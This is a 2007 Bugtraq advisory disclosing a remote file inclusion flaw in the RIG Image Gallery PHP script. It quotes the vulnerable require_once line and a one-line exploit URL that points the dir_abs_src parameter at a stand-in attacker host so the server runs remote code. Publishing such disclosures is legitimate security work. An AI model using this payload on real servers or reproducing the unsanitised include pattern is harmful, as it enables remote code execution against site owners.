[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20070730190956.2307.qmail@securityfocus.com>
Date: 30 Jul 2007 19:09:56 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
-------------------------------------------------------------------------------------------------------------------
MEFISTO PreSents...
Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
-------------------------------------------------------------------------------------------------------------------
Exploit: check_entry.php?dir_abs_src=http://attacker.php?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Ajann,Dumenci,Str0ke
Powered by blists - more mailing lists